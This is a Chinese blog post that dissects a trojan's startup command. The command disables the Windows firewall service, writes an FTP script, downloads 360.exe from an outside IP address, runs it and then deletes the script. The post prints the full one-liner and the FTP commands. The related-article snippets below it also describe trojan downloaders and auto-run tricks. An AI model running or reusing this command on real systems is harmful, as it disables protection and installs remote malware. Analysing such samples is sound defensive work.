一个木马的自动下载运行批处理命令

最新推荐文章于 2022-11-10 15:53:00 发布
最新推荐文章于 2022-11-10 15:53:00 发布
阅读量5.7k 收藏 2
点赞数
分类专栏: 杂类 文章标签: 360 防火墙 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bill_lee_sh_cn/article/details/6257440
版权

以下这段话被加入了开机启动,自动下载名为360.exe的木马并运行

"c:/windows/system32/cmd.exe" /c net1 stop sharedaccess &echo open 221.13.32.83  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 360.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&360.exe&360.exe&del cmd.txt /q

大致步骤为:

1.关闭防火墙

2.生成一个cmd.txt文件,作为ftp的命令输入文件,这个文件内容如下:

open 221.13.32.83 
123
123
binary
get 360.exe
bye

3.使用ftp进行下载

4.运行下载的360.exe

 

一头老毅
关注
专栏目录
dos批处理命令详解
海笑天涯
04-08 511
一.简单批处理内部命令简介 1.Echo 命令打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法:echo [{on│off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命 令到特定格式的文
windows 批处理 实现在后台开启自动下载任务
皮皮虾图形学
01-24 962
REM rem关键字为注释的意思 REM 设置变量值 为当前批处理文件所在目录下的external文件夹 set EXT=%~dp0external REM 设置消息回显,%EXT%为引用变量名 echo Installing dependencies into %EXT% REM 如果不存在这个文件夹,就创建这个文件夹。 if not exist %EXT% md %EXT%
cmd 中echo 写入vbs下载木马
ShadowAssassin的专栏
11-30 2245
转:http://www.hackseo.net/post/131.html Sub download(url,target) iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) Set xPost=createObject("Microsoft.XMLHTTP") xPost.Open "
模拟木马程序病原体并让木马程序自动运行
02-12 882
模拟黑客修改系统命令,制作病原体,并将病原体脚本放入定时任务、开机自启 生成木马程序病原体 [root@fp-21 ~]# vim /usr/bin/tom # /usr/bin目录下 #!/bin/bash touch /tmp/aaa.txt while : do echo `date` >> /tmp/date.txt # 输出时间 s...
一条命令批量下载文件
颹蕭蕭
09-07 312
curl -O https://web.stanford.edu/class/cs259d/lectures/Session[1-20].pdf
一个适合网管用的万能批处理
12-02
批处理(Batch Processing)是计算机科学中的一种技术,允许用户通过编写一系列命令来一次性执行多条操作,极大地提高了工作效率。 在网管的工作中,可能会涉及到各种任务,如网络设备配置、系统维护、故障排查、...
bat 批处理命令 文件 类型 语法 格式 应用 详解
04-01
### 批处理命令详解 #### 一、批处理基础概念 批处理,即BATCH,是一种在DOS环境下运行的脚本语言应用形式。通过编写一系列的DOS命令,实现特定的功能或完成复杂的任务。批处理文件通常以`.bat`为扩展名。 #### ...
运行命令大全300条
01-29
命令通常与自动化脚本有关,比如在批处理文件中,你可以编写一系列命令来完成特定任务。例如,`for /F`循环命令可读取文件中的每一行并执行相应操作,提高工作效率。 4. **防木马捆绑工具**: 防木马捆绑工具的...
批处理一次执行一个文件夹下的所有exe
10-18
一个文件夹下存在多个exe,依次去执行一个文件下下的所有exe,入:a.exe执行玩之后再去执行另外一个exe
开机自动运行的位置和木马运行方式
http://www.softwareace.cn 王牌软件
04-28 751
1. 把程序或快捷方式放在 C:\Documents and Settings\你的用户名\「开始」菜单\程序\启动\ 2. 注册表位置: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru
计算机木马不会主动传播什么疾病,研究如何制作自动运行木马病毒以及如何传播...
weixin_39565021的博客
07-28 791
我一直对Autorun.inf病毒感兴趣. 这个无敌的家伙使防病毒软件无用,因为它等同于用户单击的病毒或木马. 而且这种传播方式是相对隐蔽的. 今天,我将与我自己讨论如何制作这种U盘病毒.Autorun.inf此文件位于硬盘分区的根目录中. 只要双击驱动器号,就会自动运行用Autorun.inf编写的程序,这等效于自动批处理. 想到这种方法的人确实是个天才. 让我们研究一下如何制作此U盘病毒的罪魁...
网页打开后自动执行木马
cqhand的专栏
02-02 1056
lcx run_exe="run_exe+="CODEBASE=/"muma.exe#version=1,1,1,1/">" //这里的muma.exe就是我们要运行的程序 run_exe+="" run_exe+="" run_exe+="等会......网页在下载支持的文件"; //这里是迷惑人的.你可以写其他任何东西. document.open(); document.clear(); d
下载木马到目标机器
08-04 466
本文主要讲述如何将各种木马下载到目标机器,然后进行执行,以便进行下一步的执行。 寻找目录 下载木马到目标主机,首先对应文件夹要有写权限吧,那你想执行得有执行权限吧,所以 icacls directory /t:检查目录地下子目录以及档案的权限 具体可以参考https://dotblogs.com.tw/ghoseliang/2013/03/04/95113 vbs下载木马 VBS是基于Visual Basic的脚本语言。VBS的全称是:Microsoft Visual Basic Script E.
网页木马扫描器(文件批处理工具)
weixin_30929195的博客
03-23 155
用dotnet写了一个小工具,多文件处理工具。Download Demo! Download!!! Source Code 可以清除网页的木马! 可以多文件编码转换 转载于:https://www.cnblogs.com/xingquan/archive/2011/03/23/webscan.html...
BAT批处理脚本自动执行指定路径下程序
最新发布
gaoduicai的博客
11-10 6125
使用nacos+springboot的微服务架构,每次跑程序前要先启动nacos比较麻烦,然后就写了个简单的批处理,双击直接打开一个cmd执行nacos启动命令
一个 简单的cmd 木马(源代码)
热门推荐
tony的专栏
10-25 4万+
一个 简单的cmd 木马(源代码) // woodtc.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include "WoodSMTP.h"#define BUFFER_SIZE 1024typedef struct{HANDLE hPipe;SOCKET sC
自动下载自动执行API函数
weixin_53344209的博客
05-17 235
我们介绍两个有趣的API函数,自动下载自动执行。这和我们生活很贴切。 1、URLDownloadToFile函数 名称很直白,类似于python中的爬虫,但功能应该没有那么丰富,原理也不太一样。 用法: #include <windows.h> #include <tchar.h> #include<stdio.h> #pragma comment(lib,"Urlmon.lib") int WINAPI WinMain( HINSTANCE hInstance, HI
C语言反弹连接木马详解:U盘与磁盘感染、自动下载技术
本文档是一篇关于C语言实现的反弹连接型感染型木马的技术教程,主要关注于病毒的基本技术应用,如U盘感染、磁盘感染以及自动下载功能。作者H·Y·H在2011年5月15日完成了这个项目的编写。 首先,我们来概述文章的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值